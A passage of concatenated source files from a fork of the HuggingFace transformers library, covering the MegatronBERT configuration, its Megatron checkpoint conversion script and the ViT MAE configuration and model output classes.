return_dict=return_dict,
)
sequence_output = outputs[0]
logits = self.qa_outputs(sequence_output)
start_logits, end_logits = logits.split(1, dim=-1)
start_logits = start_logits.squeeze(-1).contiguous()
end_logits = end_logits.squeeze(-1).contiguous()
total_loss = None
if start_positions is not None and end_positions is not None:
# If we are on multi-GPU, split add a dimension
if len(start_positions.size()) > 1:
start_positions = start_positions.squeeze(-1)
if len(end_positions.size()) > 1:
end_positions = end_positions.squeeze(-1)
# sometimes the start/end positions are outside our model inputs, we ignore these terms
ignored_index = start_logits.size(1)
start_positions = start_positions.clamp(0, ignored_index)
end_positions = end_positions.clamp(0, ignored_index)
loss_fct = CrossEntropyLoss(ignore_index=ignored_index)
start_loss = loss_fct(start_logits, start_positions)
end_loss = loss_fct(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2
if not return_dict:
output = (start_logits, end_logits) + outputs[2:]
return ((total_loss,) + output) if total_loss is not None else output
return QuestionAnsweringModelOutput(
loss=total_loss,
start_logits=start_logits,
end_logits=end_logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 2,506 | src/transformers/models/megatron_bert/__init__.py | # Copyright 2021 NVIDIA Corporation and The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import OptionalDependencyNotAvailable, _LazyModule, is_torch_available
_import_structure = {
"configuration_megatron_bert": ["MEGATRON_BERT_PRETRAINED_CONFIG_ARCHIVE_MAP", "MegatronBertConfig"],
}
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["modeling_megatron_bert"] = [
"MEGATRON_BERT_PRETRAINED_MODEL_ARCHIVE_LIST",
"MegatronBertForCausalLM",
"MegatronBertForMaskedLM",
"MegatronBertForMultipleChoice",
"MegatronBertForNextSentencePrediction",
"MegatronBertForPreTraining",
"MegatronBertForQuestionAnswering",
"MegatronBertForSequenceClassification",
"MegatronBertForTokenClassification",
"MegatronBertModel",
"MegatronBertPreTrainedModel",
]
if TYPE_CHECKING:
from .configuration_megatron_bert import MEGATRON_BERT_PRETRAINED_CONFIG_ARCHIVE_MAP, MegatronBertConfig
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .modeling_megatron_bert import (
MEGATRON_BERT_PRETRAINED_MODEL_ARCHIVE_LIST,
MegatronBertForCausalLM,
MegatronBertForMaskedLM,
MegatronBertForMultipleChoice,
MegatronBertForNextSentencePrediction,
MegatronBertForPreTraining,
MegatronBertForQuestionAnswering,
MegatronBertForSequenceClassification,
MegatronBertForTokenClassification,
MegatronBertModel,
MegatronBertPreTrainedModel,
)
else:
import sys
sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 13,685 | src/transformers/models/megatron_bert/convert_megatron_bert_checkpoint.py | ####################################################################################################
# Copyright (c) 2021-, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
####################################################################################################
#
# Note: If when running this conversion script you're getting an exception:
# ModuleNotFoundError: No module named 'megatron.model.enums'
# you need to tell python where to find the clone of Megatron-LM, e.g.:
#
# cd /tmp
# git clone https://github.com/NVIDIA/Megatron-LM
# PYTHONPATH=/tmp/Megatron-LM python src/transformers/models/megatron_bert/convert_megatron_bert_checkpoint.py ...
#
# if you already have it cloned elsewhere, simply adjust the path to the existing path
#
# If the training was done using a Megatron-LM fork, e.g.,
# https://github.com/microsoft/Megatron-DeepSpeed/ then chances are that you need to have that one
# in your path, i.e., /path/to/Megatron-DeepSpeed/
#
import argparse
import os
import re
import zipfile
import torch
from transformers import MegatronBertConfig
####################################################################################################
def recursive_print(name, val, spaces=0):
# Format the message.
if name is None:
msg = None
else:
fmt = "." * max(0, spaces - 2) + "# {:" + str(50 - spaces) + "s}"
msg = fmt.format(name)
# Print and recurse (if needed).
if isinstance(val, dict):
if msg is not None:
print(msg)
for k in val.keys():
recursive_print(k, val[k], spaces + 2)
elif isinstance(val, torch.Tensor):
print(msg, ":", val.size())
else:
print(msg, ":", val)
def fix_query_key_value_ordering(param, checkpoint_version, num_splits, num_heads, hidden_size):
# Permutes layout of param tensor to [num_splits * num_heads * hidden_size, :]
# for compatibility with later versions of NVIDIA Megatron-LM.
# The inverse operation is performed inside Megatron-LM to read checkpoints:
# https://github.com/NVIDIA/Megatron-LM/blob/v2.4/megatron/checkpointing.py#L209
# If param is the weight tensor of the self-attention block, the returned tensor
# will have to be transposed one more time to be read by HuggingFace BERT.
input_shape = param.size()
if checkpoint_version == 1.0:
# version 1.0 stores [num_heads * hidden_size * num_splits, :]
saved_shape = (num_heads, hidden_size, num_splits) + input_shape[1:]
param = param.view(*saved_shape)
param = param.transpose(0, 2)
param = param.transpose(1, 2).contiguous()
elif checkpoint_version >= 2.0:
# other versions store [num_heads * num_splits * hidden_size, :]
saved_shape = (num_heads, num_splits, hidden_size) + input_shape[1:]
param = param.view(*saved_shape)
param = param.transpose(0, 1).contiguous()
param = param.view(*input_shape)
return param
####################################################################################################
def convert_megatron_checkpoint(args, input_state_dict, config):
# The converted output model.
output_state_dict = {}
# old versions did not store training args
ds_args = input_state_dict.get("args", None)
if ds_args is not None:
# do not make the user write a config file when the exact dimensions/sizes are already in the checkpoint
# from pprint import pprint
# pprint(vars(ds_args))
config.tokenizer_type = ds_args.tokenizer_type
config.vocab_size = ds_args.padded_vocab_size
config.max_position_embeddings = ds_args.max_position_embeddings
config.hidden_size = ds_args.hidden_size
config.num_hidden_layers = ds_args.num_layers
config.num_attention_heads = ds_args.num_attention_heads
config.intermediate_size = ds_args.ffn_hidden_size if "ffn_hidden_size" in ds_args else 4 * ds_args.hidden_size
# pprint(config)
# The number of heads.
heads = config.num_attention_heads
# The hidden_size per head.
hidden_size_per_head = config.hidden_size // heads
# Megatron-LM checkpoint version
if "checkpoint_version" in input_state_dict.keys():
checkpoint_version = input_state_dict["checkpoint_version"]
else:
checkpoint_version = 0.0
# The model.
model = input_state_dict["model"]
# The language model.
lm = model["language_model"]
# The embeddings.
embeddings = lm["embedding"]
# The word embeddings.
word_embeddings = embeddings["word_embeddings"]["weight"]
# Truncate the embedding table to vocab_size rows.
word_embeddings = word_embeddings[: config.vocab_size, :]
# Store the word embeddings.
output_state_dict["bert.embeddings.word_embeddings.weight"] = word_embeddings
# The position embeddings.
pos_embeddings = embeddings["position_embeddings"]["weight"]
assert pos_embeddings.size(0) == config.max_position_embeddings and pos_embeddings.size(1) == config.hidden_size
# Store the position embeddings.
output_state_dict["bert.embeddings.position_embeddings.weight"] = pos_embeddings
# The token-type embeddings.
tokentype_embeddings = embeddings["tokentype_embeddings"]["weight"]
# Store the position embeddings.
output_state_dict["bert.embeddings.token_type_embeddings.weight"] = tokentype_embeddings
# The transformer.
transformer = lm["transformer"] if "transformer" in lm.keys() else lm["encoder"]
# The regex to extract layer names.
layer_re = re.compile("layers\.(\d+)\.([a-z0-9_.]+)\.([a-z]+)")
# The simple map of names for "automated" rules.
megatron_to_transformers = {
"attention.dense": ".attention.output.dense.",
"self_attention.dense": ".attention.output.dense.",
"mlp.dense_h_to_4h": ".intermediate.dense.",
"mlp.dense_4h_to_h": ".output.dense.",
}
# Keep track of the attention/query/value tensor.
attention_qkv_weight = None
# Extract the layers.
for key, val in transformer.items():
# Match the name.
m = layer_re.match(key)
# Stop if that's not a layer
if m is None:
break
# The index of the layer.
layer_idx = int(m.group(1))
# The name of the operation.
op_name = m.group(2)
# Is it a weight or a bias?
weight_or_bias = m.group(3)
# The name of the layer.
layer_name = f"bert.encoder.layer.{layer_idx}"
# For layernorm(s), simply store the layer norm.
if op_name.endswith("layernorm"):
ln_name = "attention.ln" if op_name.startswith("input") else "ln"
output_state_dict[layer_name + "." + ln_name + "." + weight_or_bias] = val
# Transpose the QKV matrix.
elif (
op_name == "attention.query_key_value" or op_name == "self_attention.query_key_value"
) and weight_or_bias == "weight":
# Make sure the QKV pointer is nil.
assert attention_qkv_weight is None, ""
out_val = fix_query_key_value_ordering(val, checkpoint_version, 3, heads, hidden_size_per_head)
# Store the tensor as we need the bias as well to interleave QKV and biases.
attention_qkv_weight = out_val
# Transpose the bias.
elif (
op_name == "attention.query_key_value" or op_name == "self_attention.query_key_value"
) and weight_or_bias == "bias":
# Make sure we read the weight tensor.
assert attention_qkv_weight is not None, ""
# Split the QKV matrix into Q, K and V. Megatron stores Q,K,V interleaved.
q = attention_qkv_weight[0 * config.hidden_size : 1 * config.hidden_size, :]
k = attention_qkv_weight[1 * config.hidden_size : 2 * config.hidden_size, :]
v = attention_qkv_weight[2 * config.hidden_size : 3 * config.hidden_size, :]
out_val = fix_query_key_value_ordering(val, checkpoint_version, 3, heads, hidden_size_per_head)
# Split the bias.
q_bias = out_val[0 * config.hidden_size : 1 * config.hidden_size]
k_bias = out_val[1 * config.hidden_size : 2 * config.hidden_size]
v_bias = out_val[2 * config.hidden_size : 3 * config.hidden_size]
# Store.
output_state_dict[f"{layer_name}.attention.self.query.weight"] = q
output_state_dict[f"{layer_name}.attention.self.query.bias"] = q_bias
output_state_dict[f"{layer_name}.attention.self.key.weight"] = k
output_state_dict[f"{layer_name}.attention.self.key.bias"] = k_bias
output_state_dict[f"{layer_name}.attention.self.value.weight"] = v
output_state_dict[f"{layer_name}.attention.self.value.bias"] = v_bias
# Clear the stored tensor.
attention_qkv_weight = None
# Copy weights and biases as is.
elif weight_or_bias in ["weight", "bias"]:
out_name = megatron_to_transformers[op_name]
output_state_dict[layer_name + out_name + weight_or_bias] = val
# The final layernorm.
output_state_dict["bert.encoder.ln.weight"] = transformer["final_layernorm.weight"]
output_state_dict["bert.encoder.ln.bias"] = transformer["final_layernorm.bias"]
# The pooler.
pooler = lm["pooler"]
# Store the matrix and the bias.
output_state_dict["bert.pooler.dense.weight"] = pooler["dense.weight"]
output_state_dict["bert.pooler.dense.bias"] = pooler["dense.bias"]
# The LM head from Megatron (for RACE).
lm_head = model["lm_head"]
# The transform matrix.
output_state_dict["cls.predictions.transform.dense.weight"] = lm_head["dense.weight"]
output_state_dict["cls.predictions.transform.dense.bias"] = lm_head["dense.bias"]
# The transform LN.
output_state_dict["cls.predictions.transform.LayerNorm.weight"] = lm_head["layernorm.weight"]
output_state_dict["cls.predictions.transform.LayerNorm.bias"] = lm_head["layernorm.bias"]
# For the decoder, we replicate the weights.
output_state_dict["cls.predictions.decoder.weight"] = word_embeddings
output_state_dict["cls.predictions.bias"] = lm_head["bias"]
# The classifier from Megatron (for MLNI).
binary_head = model["binary_head"]
# Store the classifier.
output_state_dict["cls.seq_relationship.weight"] = binary_head["weight"]
output_state_dict["cls.seq_relationship.bias"] = binary_head["bias"]
# It should be done!
return output_state_dict
####################################################################################################
def main():
# Create the argument parser.
parser = argparse.ArgumentParser()
parser.add_argument("--print-checkpoint-structure", action="store_true")
parser.add_argument("path_to_checkpoint", type=str, help="Path to the ZIP file containing the checkpoint")
parser.add_argument(
"--config_file",
default="",
type=str,
help="An optional config json file describing the pre-trained model.",
)
args = parser.parse_args()
# Extract the basename.
basename = os.path.dirname(args.path_to_checkpoint)
# Load the model.
# the .zip is very optional, let's keep it for backward compatibility
print(f'Extracting PyTorch state dictionary from "{args.path_to_checkpoint}"')
if args.path_to_checkpoint.endswith(".zip"):
with zipfile.ZipFile(args.path_to_checkpoint, "r") as checkpoint:
with checkpoint.open("release/mp_rank_00/model_optim_rng.pt") as pytorch_dict:
input_state_dict = torch.load(pytorch_dict, map_location="cpu")
else:
input_state_dict = torch.load(args.path_to_checkpoint, map_location="cpu")
if args.config_file == "":
# Default config of megatron-bert 345m
config = MegatronBertConfig()
# different megatron-bert-*-345m models have different vocab sizes, so override the default
# config (which is for megatron-bert-cased-345m) with the actual vocab dimension
config.vocab_size = input_state_dict["model"]["lm_head"]["bias"].numel()
else:
config = MegatronBertConfig.from_json_file(args.config_file)
# Convert.
print("Converting")
output_state_dict = convert_megatron_checkpoint(args, input_state_dict, config)
# Print the structure of converted state dict.
if args.print_checkpoint_structure:
recursive_print(None, output_state_dict)
# Store the config to file.
print("Saving config")
config.save_pretrained(basename)
# Store the state_dict to file.
output_checkpoint_file = os.path.join(basename, "pytorch_model.bin")
print(f'Saving checkpoint to "{output_checkpoint_file}"')
torch.save(output_state_dict, output_checkpoint_file)
####################################################################################################
if __name__ == "__main__":
main()
####################################################################################################
|
27182812/ChatGLM-LLaMA-chinese-insturct | 6,573 | src/transformers/models/megatron_bert/configuration_megatron_bert.py | # coding=utf-8
# Copyright 2021- NVIDIA Corporation and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" MEGATRON_BERT model configuration"""
from ...configuration_utils import PretrainedConfig
from ...utils import logging
logger = logging.get_logger(__name__)
MEGATRON_BERT_PRETRAINED_CONFIG_ARCHIVE_MAP = {
# See all MEGATRON_BERT models at https://huggingface.co/models?filter=bert
}
class MegatronBertConfig(PretrainedConfig):
r"""
This is the configuration class to store the configuration of a [`MegatronBertModel`]. It is used to instantiate a
MEGATRON_BERT model according to the specified arguments, defining the model architecture. Instantiating a
configuration with the defaults will yield a similar configuration to that of the MEGATRON_BERT
[nvidia/megatron-bert-uncased-345m](https://huggingface.co/nvidia/megatron-bert-uncased-345m) architecture.
Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
documentation from [`PretrainedConfig`] for more information.
Args:
vocab_size (`int`, *optional*, defaults to 29056):
Vocabulary size of the MEGATRON_BERT model. Defines the number of different tokens that can be represented
by the `inputs_ids` passed when calling [`MegatronBertModel`].
hidden_size (`int`, *optional*, defaults to 1024):
Dimensionality of the encoder layers and the pooler layer.
num_hidden_layers (`int`, *optional*, defaults to 24):
Number of hidden layers in the Transformer encoder.
num_attention_heads (`int`, *optional*, defaults to 16):
Number of attention heads for each attention layer in the Transformer encoder.
intermediate_size (`int`, *optional*, defaults to 4096):
Dimensionality of the "intermediate" (often named feed-forward) layer in the Transformer encoder.
hidden_act (`str` or `Callable`, *optional*, defaults to `"gelu"`):
The non-linear activation function (function or string) in the encoder and pooler. If string, `"gelu"`,
`"relu"`, `"silu"` and `"gelu_new"` are supported.
hidden_dropout_prob (`float`, *optional*, defaults to 0.1):
The dropout probability for all fully connected layers in the embeddings, encoder, and pooler.
attention_probs_dropout_prob (`float`, *optional*, defaults to 0.1):
The dropout ratio for the attention probabilities.
max_position_embeddings (`int`, *optional*, defaults to 512):
The maximum sequence length that this model might ever be used with. Typically set this to something large
just in case (e.g., 512 or 1024 or 2048).
type_vocab_size (`int`, *optional*, defaults to 2):
The vocabulary size of the `token_type_ids` passed when calling [`MegatronBertModel`].
initializer_range (`float`, *optional*, defaults to 0.02):
The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
layer_norm_eps (`float`, *optional*, defaults to 1e-12):
The epsilon used by the layer normalization layers.
position_embedding_type (`str`, *optional*, defaults to `"absolute"`):
Type of position embedding. Choose one of `"absolute"`, `"relative_key"`, `"relative_key_query"`. For
positional embeddings use `"absolute"`. For more information on `"relative_key"`, please refer to
[Self-Attention with Relative Position Representations (Shaw et al.)](https://arxiv.org/abs/1803.02155).
For more information on `"relative_key_query"`, please refer to *Method 4* in [Improve Transformer Models
with Better Relative Position Embeddings (Huang et al.)](https://arxiv.org/abs/2009.13658).
is_decoder (`bool`, *optional*, defaults to `False`):
Whether the model is used as a decoder or not. If `False`, the model is used as an encoder.
use_cache (`bool`, *optional*, defaults to `True`):
Whether or not the model should return the last key/values attentions (not used by all models). Only
relevant if `config.is_decoder=True`.
Examples:
```python
>>> from transformers import MegatronBertConfig, MegatronBertModel
>>> # Initializing a MEGATRON_BERT bert-base-uncased style configuration
>>> configuration = MegatronBertConfig()
>>> # Initializing a model (with random weights) from the bert-base-uncased style configuration
>>> model = MegatronBertModel(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
```"""
model_type = "megatron-bert"
def __init__(
self,
vocab_size=29056,
hidden_size=1024,
num_hidden_layers=24,
num_attention_heads=16,
intermediate_size=4096,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=2,
initializer_range=0.02,
layer_norm_eps=1e-12,
pad_token_id=0,
position_embedding_type="absolute",
use_cache=True,
**kwargs,
):
super().__init__(pad_token_id=pad_token_id, **kwargs)
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.hidden_act = hidden_act
self.intermediate_size = intermediate_size
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.max_position_embeddings = max_position_embeddings
self.type_vocab_size = type_vocab_size
self.initializer_range = initializer_range
self.layer_norm_eps = layer_norm_eps
self.position_embedding_type = position_embedding_type
self.use_cache = use_cache
|
27182812/ChatGLM-LLaMA-chinese-insturct | 2,428 | src/transformers/models/vit_mae/__init__.py | # Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import (
OptionalDependencyNotAvailable,
_LazyModule,
is_flax_available,
is_tf_available,
is_torch_available,
)
_import_structure = {"configuration_vit_mae": ["VIT_MAE_PRETRAINED_CONFIG_ARCHIVE_MAP", "ViTMAEConfig"]}
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["modeling_vit_mae"] = [
"VIT_MAE_PRETRAINED_MODEL_ARCHIVE_LIST",
"ViTMAEForPreTraining",
"ViTMAELayer",
"ViTMAEModel",
"ViTMAEPreTrainedModel",
]
try:
if not is_tf_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["modeling_tf_vit_mae"] = [
"TFViTMAEForPreTraining",
"TFViTMAEModel",
"TFViTMAEPreTrainedModel",
]
if TYPE_CHECKING:
from .configuration_vit_mae import VIT_MAE_PRETRAINED_CONFIG_ARCHIVE_MAP, ViTMAEConfig
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .modeling_vit_mae import (
VIT_MAE_PRETRAINED_MODEL_ARCHIVE_LIST,
ViTMAEForPreTraining,
ViTMAELayer,
ViTMAEModel,
ViTMAEPreTrainedModel,
)
try:
if not is_tf_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .modeling_tf_vit_mae import TFViTMAEForPreTraining, TFViTMAEModel, TFViTMAEPreTrainedModel
else:
import sys
sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 6,568 | src/transformers/models/vit_mae/configuration_vit_mae.py | # coding=utf-8
# Copyright 2022 Facebook AI and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" ViT MAE model configuration"""
from ...configuration_utils import PretrainedConfig
from ...utils import logging
logger = logging.get_logger(__name__)
VIT_MAE_PRETRAINED_CONFIG_ARCHIVE_MAP = {
"facebook/vit-mae-base": "https://huggingface.co/facebook/vit-mae-base/resolve/main/config.json",
# See all ViT MAE models at https://huggingface.co/models?filter=vit-mae
}
class ViTMAEConfig(PretrainedConfig):
r"""
This is the configuration class to store the configuration of a [`ViTMAEModel`]. It is used to instantiate an ViT
MAE model according to the specified arguments, defining the model architecture. Instantiating a configuration with
the defaults will yield a similar configuration to that of the ViT
[facebook/vit-mae-base](https://huggingface.co/facebook/vit-mae-base) architecture.
Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
documentation from [`PretrainedConfig`] for more information.
Args:
hidden_size (`int`, *optional*, defaults to 768):
Dimensionality of the encoder layers and the pooler layer.
num_hidden_layers (`int`, *optional*, defaults to 12):
Number of hidden layers in the Transformer encoder.
num_attention_heads (`int`, *optional*, defaults to 12):
Number of attention heads for each attention layer in the Transformer encoder.
intermediate_size (`int`, *optional*, defaults to 3072):
Dimensionality of the "intermediate" (i.e., feed-forward) layer in the Transformer encoder.
hidden_act (`str` or `function`, *optional*, defaults to `"gelu"`):
The non-linear activation function (function or string) in the encoder and pooler. If string, `"gelu"`,
`"relu"`, `"selu"` and `"gelu_new"` are supported.
hidden_dropout_prob (`float`, *optional*, defaults to 0.0):
The dropout probabilitiy for all fully connected layers in the embeddings, encoder, and pooler.
attention_probs_dropout_prob (`float`, *optional*, defaults to 0.0):
The dropout ratio for the attention probabilities.
initializer_range (`float`, *optional*, defaults to 0.02):
The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
layer_norm_eps (`float`, *optional*, defaults to 1e-12):
The epsilon used by the layer normalization layers.
image_size (`int`, *optional*, defaults to 224):
The size (resolution) of each image.
patch_size (`int`, *optional*, defaults to 16):
The size (resolution) of each patch.
num_channels (`int`, *optional*, defaults to 3):
The number of input channels.
qkv_bias (`bool`, *optional*, defaults to `True`):
Whether to add a bias to the queries, keys and values.
decoder_num_attention_heads (`int`, *optional*, defaults to 12):
Number of attention heads for each attention layer in the decoder.
decoder_hidden_size (`int`, *optional*, defaults to 512):
Dimensionality of the decoder.
decoder_num_hidden_layers (`int`, *optional*, defaults to 8):
Number of hidden layers in the decoder.
decoder_intermediate_size (`int`, *optional*, defaults to 2048):
Dimensionality of the "intermediate" (i.e., feed-forward) layer in the decoder.
mask_ratio (`float`, *optional*, defaults to 0.75):
The ratio of the number of masked tokens in the input sequence.
norm_pix_loss (`bool`, *optional*, defaults to `False`):
Whether or not to train with normalized pixels (see Table 3 in the paper). Using normalized pixels improved
representation quality in the experiments of the authors.
Example:
```python
>>> from transformers import ViTMAEConfig, ViTMAEModel
>>> # Initializing a ViT MAE vit-mae-base style configuration
>>> configuration = ViTMAEConfig()
>>> # Initializing a model (with random weights) from the vit-mae-base style configuration
>>> model = ViTMAEModel(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
```"""
model_type = "vit_mae"
def __init__(
self,
hidden_size=768,
num_hidden_layers=12,
num_attention_heads=12,
intermediate_size=3072,
hidden_act="gelu",
hidden_dropout_prob=0.0,
attention_probs_dropout_prob=0.0,
initializer_range=0.02,
layer_norm_eps=1e-12,
image_size=224,
patch_size=16,
num_channels=3,
qkv_bias=True,
decoder_num_attention_heads=16,
decoder_hidden_size=512,
decoder_num_hidden_layers=8,
decoder_intermediate_size=2048,
mask_ratio=0.75,
norm_pix_loss=False,
**kwargs,
):
super().__init__(**kwargs)
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.initializer_range = initializer_range
self.layer_norm_eps = layer_norm_eps
self.image_size = image_size
self.patch_size = patch_size
self.num_channels = num_channels
self.qkv_bias = qkv_bias
self.decoder_num_attention_heads = decoder_num_attention_heads
self.decoder_hidden_size = decoder_hidden_size
self.decoder_num_hidden_layers = decoder_num_hidden_layers
self.decoder_intermediate_size = decoder_intermediate_size
self.mask_ratio = mask_ratio
self.norm_pix_loss = norm_pix_loss
|
27182812/ChatGLM-LLaMA-chinese-insturct | 43,355 | src/transformers/models/vit_mae/modeling_vit_mae.py | # coding=utf-8
# Copyright 2022 Facebook AI and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch ViT MAE (masked autoencoder) model."""
import collections.abc
import math
from copy import deepcopy
from dataclasses import dataclass
from typing import Optional, Set, Tuple, Union
import numpy as np
import torch
import torch.utils.checkpoint
from torch import nn
from ...activations import ACT2FN
from ...modeling_outputs import BaseModelOutput
from ...modeling_utils import PreTrainedModel
from ...pytorch_utils import find_pruneable_heads_and_indices, prune_linear_layer
from ...utils import (
ModelOutput,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
replace_return_docstrings,
)
from .configuration_vit_mae import ViTMAEConfig
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "ViTMAEConfig"
_CHECKPOINT_FOR_DOC = "facebook/vit-mae-base"
VIT_MAE_PRETRAINED_MODEL_ARCHIVE_LIST = [
"facebook/vit-mae-base",
# See all ViTMAE models at https://huggingface.co/models?filter=vit_mae
]
@dataclass
class ViTMAEModelOutput(ModelOutput):
"""
Class for ViTMAEModel's outputs, with potential hidden states and attentions.
Args:
last_hidden_state (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`):
Sequence of hidden-states at the output of the last layer of the model.
mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`):
Tensor indicating which patches are masked (1) and which are not (0).
ids_restore (`torch.LongTensor` of shape `(batch_size, sequence_length)`):
Tensor containing the original index of the (shuffled) masked patches.
hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
shape `(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer
plus the initial embedding outputs.
attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in
the self-attention heads.
"""
last_hidden_state: torch.FloatTensor = None
mask: torch.LongTensor = None
ids_restore: torch.LongTensor = None
hidden_states: Optional[Tuple[torch.FloatTensor]] = None
attentions: Optional[Tuple[torch.FloatTensor]] = None
@dataclass
class ViTMAEDecoderOutput(ModelOutput):
"""
Class for ViTMAEDecoder's outputs, with potential hidden states and attentions.
Args:
logits (`torch.FloatTensor` of shape `(batch_size, sequence_length, patch_size ** 2 * num_channels)`):
Pixel reconstruction logits.
hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
shape `(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer
plus the initial embedding outputs.
attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in
the self-attention heads.
"""
logits: torch.FloatTensor = None
hidden_states: Optional[Tuple[torch.FloatTensor]] = None
attentions: Optional[Tuple[torch.FloatTensor]] = None
@dataclass
class ViTMAEForPreTrainingOutput(ModelOutput):
"""
Class for ViTMAEForPreTraining's outputs, with potential hidden states and attentions.
Args:
loss (`torch.FloatTensor` of shape `(1,)`):
Pixel reconstruction loss.
logits (`torch.FloatTensor` of shape `(batch_size, sequence_length, patch_size ** 2 * num_channels)`):
Pixel reconstruction logits.
mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`):
Tensor indicating which patches are masked (1) and which are not (0).
ids_restore (`torch.LongTensor` of shape `(batch_size, sequence_length)`):
Tensor containing the original index of the (shuffled) masked patches.
hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
shape `(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer
plus the initial embedding outputs.
